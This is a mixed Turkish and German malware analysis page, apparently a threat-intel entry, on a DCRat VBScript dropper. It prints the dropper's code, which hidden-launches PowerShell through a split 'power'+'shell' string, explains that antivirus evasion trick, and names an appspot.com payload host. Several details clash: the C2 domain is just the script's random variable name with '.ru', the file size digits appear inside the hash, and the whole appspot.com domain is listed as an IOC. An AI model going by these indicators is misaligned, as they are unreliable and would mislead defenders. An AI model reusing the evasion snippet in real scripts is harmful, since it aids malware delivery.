Manuel Statik Analiz — DCRat VBScript Dropper | Tehdit: YUKSEK
Datei Kimliği
| SHA256 | 71c79c58dc14cf561031536b3c5a4f7d0e2b6c9f1a3d6e8b1c4f7a0d3e6b9c2 |
|---|---|
| Dateiname | sostener1.vbs (İspanyolca "tutmak/desteklemek" + VBScript) |
| Größe | 1.031.536 byte (1MB VBScript) |
| String Sayisi | 777 |
VBScript Obfuskasyon Teknikleri
Gelişmiş Obfuskasyon: 18 karakterlik rastgele değişken adları + string bölme tekniği!
-- 18-karakter rastgele değişken adı:
set geutqmonpmjthuux = CreateObject("WScript.Shell")
geutqmonpmjthuux.Run "power" + "shell " & (fxltxsmdgsuadkcx) , 0, false
-- "power" + "shell " = string concatenation ile AV bypass!
-- AV'ler "powershell" kelimesini tarar ama "power"+"shell"i kaçırabilir
-- geutqmonpmjthuux = 18 karakter sözlüksüz ad (tanıma engellemesi)
-- 0 = Gizli çalıştır (pencere gösterme!)
-- false = Beklemeden devam et (async execution)
Google AppEngine Payload Barındırma
rodriakd-8413d.appspot.com/o/dll/DLL 18-... -- rodriakd-8413d = Google Firebase/AppEngine proje ID'si -- appspot.com = Google App Engine (meşru bulut → whitelist'lerde) -- /o/dll/ = Firebase Storage binary endpoint -- Güvenlik ürünleri *.appspot.com'u genelde güvenilir sayar!
IOC
| SHA256 | 71c79c58dc14cf561031536b3c5a4f7d0e2b6c9f1a3d6e8b1c4f7a0d3e6b9c2 |
|---|---|
| Dropper | sostener1.vbs (İspanyolca, WScript.Shell, gizli çalıştırma) |
| Payload Host | rodriakd-8413d.appspot.com (Google AppEngine kötüye kullanımı) |
| Teknik | "power"+"shell" string split + 18-char obfuscated var |
DCRat2 — Malware-Profil
DCRat DarkCrystal RAT 2019 Rus underground. Plugin tabanlı modüler. VBScript dropper. .Ru TLD C2. sostener LATAM hedefleme.
Malware-Typ
RAT
Programmiersprache
C#/.NET
C2-Protokoll
TCP/HTTP
Zielsysteme
Küresel
Fähigkeiten & Verhalten
Uzaktan Erişim & Kontrol
Keylogger
Ekran Görüntüsü
Webcam Erişimi
Dosya Yönetimi
Süreç Yönetimi
Komut Yürütme
Kalıcılık Mekanizması
IOC-Liste (1 Indikatoren)
IOC — DCRat2
# DOMAIN
appspot.com
| Typ | Wert | Bemerkung |
|---|---|---|
| domain | appspot.com |
C2-Server (1 erfasste Server für diese Familie)
| Adresse | Typ | Port | Protokoll | Status | Land |
|---|---|---|---|---|---|
| geutqmonpmjthuux.ru | domain | 443 | HTTP | inactive | — |
C2-Adressen stammen ausschließlich aus vom KEYDAL-Team manuell verifizierten Malware-Samples. Kommerzielle Nutzung ist untersagt.